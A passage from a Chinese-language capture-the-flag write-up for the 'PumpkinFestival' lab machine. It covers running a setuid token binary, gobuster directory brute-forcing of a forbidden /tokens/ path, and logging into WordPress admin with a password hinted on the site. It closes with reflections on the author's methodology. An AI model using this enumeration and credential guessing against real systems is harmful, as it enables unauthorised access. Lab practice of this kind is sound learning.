token: setuid ELF 64-bit LSB  executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=977c5f4023cb5e77599fd8194089aa03f155ad88, stripped
jack@pumpkin:~$ ./token
 
PumpkinToken : 8d66ef0055b43d80c34917ec6c75f706
# 第八个PumpkinToken

还有一个是在 /tokens/ 目录下，还记得吗，在使用 IP 访问的时候，robots.txt 中给了几个目录，而 /tokens/ 目录直接访问得到的结果是 403，但是这个目录爆破还可以得到一个文件

┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ sudo gobuster dir -u http://192.168.56.140/tokens/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.140/tokens/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              html,txt
[+] Timeout:                 10s
===============================================================
2023/09/11 08:07:22 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 293]
/token.txt            (Status: 200) [Size: 48]
/.html                (Status: 403) [Size: 293]
Progress: 659599 / 661683 (99.69%)
===============================================================
2023/09/11 08:08:57 Finished
===============================================================

访问拿到了第九个PumpkinToken

PumpkinToken : 2c0e11d2200e2604587c331f02a7ebea
# 第九个PumpkinToken

最后一个藏在了 wordpress 的 admin 用户界面中，其正在编辑的 post 中藏着最后一个。而 admin 的密码，恰恰就是我们以 IP 访问时，最下面的 Alohomora! 当时搜了一下，这是哈利波特里开门的咒语，我没忘密码上去想，即使它是加粗了的字。

PumpkinToken : f2e00edc353309b40e1aed18e18ab2c4
# 第十个PumpkinToken

总结

这台靶机虽然在某些方面有一丢丢坑（没错，爆破说的就是你）。可是总体上我的收获也很多，最近打靶机的频率下降了，这台靶机在渗透思路和一些细节的把握上对我是一次惊醒——要把有限的精力放在拿到的信息上，如何有效利用已有的信息，并且完善渗透的细节，都是需要继续加油的地方。关于那一串字符串如何解，我的思路明显过于局限了，只考虑了密码，没有往编码的方向去想；关于首页中，加粗的哈利波特中开门咒语，也没忘密码方向去向；目录爆破的时候对于 403 的目录直接不管不顾，没有进一步尝试。这都是宝贵的提醒与经验